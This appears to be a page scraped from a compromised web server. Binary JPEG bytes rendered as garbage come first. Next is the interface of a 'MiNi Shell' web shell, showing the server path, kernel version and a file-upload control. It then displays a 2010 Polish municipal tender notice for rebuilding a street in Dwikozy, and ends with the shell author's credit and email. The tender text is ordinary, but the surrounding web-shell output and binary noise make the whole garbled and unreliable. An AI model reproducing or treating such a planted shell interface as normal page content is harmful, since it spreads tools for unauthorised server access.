JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100305/49417-N-2010.html

<p class="kh_header"><b>Dwikozy: Centrum Gminy - Przebudowa ul. Spółdzielczej (nr 000653T) w miejscowości Dwikozy na terenie gminy Dwikozy na odc. 0,51870 km wraz z budową chodników, parkingów, kanalizacji deszczowej oraz oświetlenia.</b><br>
<b>Numer ogłoszenia: 49417 - 2010; data zamieszczenia: 05.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dwikozy , ul. Spółdzielcza 15, 27-620 Dwikozy, woj. świętokrzyskie, tel. 015 8311471, faks 015 8311404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dwikozy.asi.pl / przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Centrum Gminy - Przebudowa ul. Spółdzielczej (nr 000653T) w miejscowości Dwikozy na terenie gminy Dwikozy na odc. 0,51870 km wraz z budową chodników, parkingów, kanalizacji deszczowej oraz oświetlenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulicy Spółdzielczej na odcinku o długości 518,70 mb. wraz z budową chodników, parkingów, kanalizacji deszczowej oraz oświetlenia w zakresie: wykonanie robót rozbiórkowych (chodniki, parkingi, korekta łuku poziomego trasy około od km 0+140 do km 0+200 - i związane z tym usunięcie kolidujących elementów zagospodarowania terenu, wzmocnienie istniejącej konstrukcji jezdni, wykonanie kompleksowej konstrukcji jezdni na całej szerokości (korekta łuku poziomego) oraz na poszerzeniach, wykonanie kompleksowej konstrukcji na parkingach, chodnikach, poboczach i zjazdach, odwodnienie: powierzchniowe w kierunku od drogi za pomocą odpowiednich spadków podłużnych i poprzecznych na jezdni, chodnikach, parkingach i poboczach do projektowanej kanalizacji deszczowej; wykonanie nowego oświetlenia parkowego, usunięcie kolizji z uzbrojeniem podziemnym i naziemnym poprzez założenie rur osłonowych lub przełożenie kolidującego uzbrojenia zgodnie z warunkami technicznymi wydanymi przez właścicieli sieci.

Branża drogowa:

Konstrukcja nawierzchni - dla podłoża G1 (moduł sprężystości (wtórny) nie mniejszy niż 100 MPa):

Jezdnia i pobocze bitumiczne:
-5 cm - warstwa ścieralna z betonu asfaltowego
-Warstwa pośrednia - z siatki z drutu stalowego lub z geosiatki o Rn powyżej 20kN/m
-0-13 cm - warstwa profilująca z betonu asfaltowego
-Istniejąca konstrukcja bitumiczna jezdni na płytach drogowych

Jezdnia - pełna szerokość i poszerzenie:
-5 cm - warstwa ścieralna z betonu asfaltowego
-7 cm - warstwa wiążąca z betonu asfaltowego
-20 cm - podbudowa z tłucznia kamiennego
-10 cm - warstwa odsączająca z piasku
-podłoże G1 (moduł sprężystości (wtórny) nie mniejszy niż 100 MPa)

Chodnik i opaska:
-6 cm - kostka brukowa betonowa
-3 cm - podsypka cementowo-piaskowa lub grys 0-7
-10 cm - podbudowa z kruszywa łam. stab. mech
-10 cm - warstwa odsączająca z piasku

Parkingi, zjazdy i jezdnie manewrowe:
-8 cm - kostka brukowa betonowa - kolor
-3 cm - podsypka cementowo-piaskowa lub grys 0-7
-20 cm - podbudowa z tłucznia kamiennego.
-10 cm - warstwa odsączająca z piasku

Parkingi, zjazdy i jezdnie manewrowe:
-8 cm - kostka brukowa betonowa - kolor
-3 cm - podsypka cementowo-piaskowa lub grys 0-7
-śr. 10 cm - podbudowa z kruszywa łam. stab. mech
-Istniejąca konstrukcja

Branża kanalizacyjna

Dla odwodnienia ulicy zaprojektowano:
-Wpusty uliczne - 31 szt.
-Odwodnienie liniowe - 10 mb
-Podłączenia wpustów z rur PCW O 200 - 250,0 mb
-Kanały deszczowe z rur PCW O 250 - 24,5 mb
-Kanały deszczowe z rur PCW O 300 - 380,0 mb
-Kanały deszczowe z rur PCW O 400 - 162,5 mb
-Kanały deszczowe z rur PCW O 450 - 34,5 mb
-Kanały deszczowe z rur PCW O 500 - 51,0 mb
-Kanały deszczowe z rur PCW O 800 - 40,0 mb
-Studnie kanalizacyjne systemowe O 600 - 32 szt.
-Studnia kanalizacyjna systemowe O 1000 - 2 szt.
-Wylot do rzeki - 1 szt.
-Separator koalescencyjny - 1 kpl.
-Usunięcie kolizji z istniejącym uzbrojeniem

Branża elektryczna:

Likwidacja kolizji energetycznych o zakresie rzeczowym:
-Odkopanie i przełożenie po nowej trasie kabla SN 15 kV XUHAKXs3x1x120 mm2 relacji sł. Nr 52 l. Gerlachów - Ożarów 2 - ST Dwikozy NR 9  Szkoła  na odcinku o łącznej długości 210 m ( wstawka dł. 40 m)
-Odkopanie i przełożenie po nowej trasie dwóch kabli nN YAKY 4x120 mm2 relacji ST Dwikozy NR 9  Szkoła - ZK  Poczta i relacji ST Dwikozy NR 9 Szkoła - ZK Bajda na odcinku o łącznej długości 210 m ( wstawka dł.2x 40 m )
-Przebudowa stanowiska P-10 NR 48 linii nN Dwikozy GS na K3 10,5 10 i zakończeniu przewodów Al.
-Demontaż słupa nr 49 oraz przewodów Al. na odcinku ok. 25 m
-Ułożenie kabla nN YAKY 4x120 mm2 - wstawka na odcinku ok. 95 m nowe stanowisko nr 48 l. napow. Dwikozy GS - mufa przed złączem ZK Policja
-Odkopanie i przełożenie po nowej trasie kabla nN YAKY 4x35 mm2 relacji ZK Ośrodek Zdrowia - ZK Bud. P Sawy na odc. 10 m
-Wykonanie zabezpieczenia istniejących kabli - rury osłonowe SRS 110 i SRS 75 na skrzyżowaniu z modernizowaną ulicą .

Budowa oświetlenia ulicznego o zakresie rzeczowym:
-Przyłącz kablowy YAKY 4x35 mm2 ze stacji transformatorowej Dwikozy NR 9 o dł. 40/50 m do szafy oświetlenia ulicznego SO.
-Szafa oświetlenia ulicznego DWIKOZY SZKOŁA wraz ze sterowaniem i 3-fazowym bezpośrednim układem pomiarowym i przystosowanym do sterowania zdalnego.
-Nowa linia kablowa wydzielonego oświetlenia ulicznego YAKY 4x35 mm2 poprzez siedem słupów S-95 z wysięgnikami jednoramiennymi St 6k 1r W1,5 i dziewięć słupów z wysięgnikami dwuramiennymi St 6k 2r W1,5 z dziewiętnastoma oprawami SGS104 PC 1xSON-TPP 150 W i sześcioma oprawami SGS103 PC 1xSON-TPP70W łącznej długości 588 (698) m
-Demontaż trzech słupów oświetlenia ulicznego.


Branża telekomunikacyjna
Przebudowa i zabezpieczenie urządzeń telekomunikacyjnych o zakresie:
- odkrycie istniejących kabli doziemnych
- założenie na kable rur osłonowych dwudzielnych typu AROT A110 PS
- zakrycie/zasypanie kabli ziemnych


Szczegółowe zakresy robót wykazane są w kosztorysach ofertowych/przedmiarach robót, które są załącznikami do SIWZ.
Dokumentacja techniczna - do wglądu w Urzędzie Gminy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie robót uzupełniających do 30% zamówienia podstawowego, zakres rzeczowy będzie tożsamy z zamówieniem podstawowym</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.23.24.00-6, 45.23.21.30-2, 45.23.14.00-9, 45.31.61.10-9, 45.23.22.10-7, 45.31.61.10-9, 50.91.12.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  40 000,00  PLN (czterdzieści tysięcy zł.) należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć: Złożyć oświadczenie na załączonym druku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca potwierdzi spełnianie warunków udziału w postępowaniu, jeżeli wykaże, że wykonał  co najmniej dwie roboty budowlane, zbliżone do przedmiotu zamówienia  o wartości nie mniejszej niż 200 000,00 zł brutto każda. Do pozycji z wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 	odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz informacji o podstawie do dysponowania tymi osobami  - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż;

Kierownik budowy - niniejsza osoba ma posiadać następujące kwalifikacje:  uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, Wymagane doświadczenie to minimum 5 lat, w tym 4 lata jako kierownik budowy 

Kierownik robót elektrycznych - niniejsza osoba ma posiadać następujące kwalifikacje: uprawnienia do kierowania robotami w specjalności instalacyjno - inżynieryjnej w zakresie instalacji elektrycznych

Kierownika robót drogowych - niniejsza osoba ma posiadać następujące kwalifikacje: uprawnienia do kierowania robotami w specjalności drogowej, z minimum 5 letnim stażem.

Do oferty należy dołączyć dokumenty potwierdzające uprawnienia wymienionych osób oraz przynależność do  właściwej Izby Samorządu Zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej posiadanie minimum 300 000 PLN środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
9.4.2	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że
wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę ubezpieczenia nie mniejszą niż 1 000 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Jeżeli w specyfikacji technicznej wykonania i odbioru robót i opisie przedmiotu zamówienia (dokumentacji), zostały określone nazwy handlowe lub parametry techniczne urządzeń to Wykonawca wraz z ofertą jest zobowiązany przedstawić wykaz oferowanych urządzeń . W wykazie należy wskazać nazwy urządzeń i sprzętu, które wykonawca przyjął do wyceny. Przez nazwę urządzenia Zamawiający uzna, jeżeli do każdego urządzenia i sprzętu zostanie przypisana nazwa producenta z typem i modelem lub poza nazwą producenta zostaną określone parametry na podstawie których będzie można zidentyfikować zgodności użytych urządzeń do wyceny.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach;

W przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych lub uzupełniających zostanie pomniejszone wynagrodzenie umowne za roboty zaniechane w oparciu o kosztorysy ofertowe/przedmiary robot. 

Zmiana terminu przewidzianego na zakończenie robót.
Zmiany spowodowane warunkami atmosferycznymi w szczególności:
- klęski żywiołowe,
- warunki atmosferyczne odbiegające od typowych dla pory roku , uniemożliwiające prowadzenie robót budowlanych

Odmienna od przyjętej w dokumentacji projektowej kategoria gruntu
Błędy w dokumentacji mające wpływ na realizację robót;
Wstrzymanie robót przez Zamawiającego;
Konieczność usunięcia błędów lub wprowadzenie zmian w    dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót.
Zmiana postanowień umowy na skutek zmian technologicznych, spowodowanych następującymi   okolicznościami;
Zmiana materiałów lub urządzeń o parametrach tożsamych lub lepszych od  przyjętych w ofercie w przypadku wycofania z rynku materiału lub urządzenia oferowanego
Przyjęcie nowszej technologii wykonania zaprojektowanych robót, pozwalającej na zaoszczędzeniu kosztów wykonania robót lub eksploatacji wykonanego przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dwikozy.asi.pl    /przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dwikozy, ul. Spółdzielcza 15, 27-620 Dwikozy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 09:00, miejsce: Urząd Gminy Dwikozy, ul. Spółdzielcza 15, pok. nr 36..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com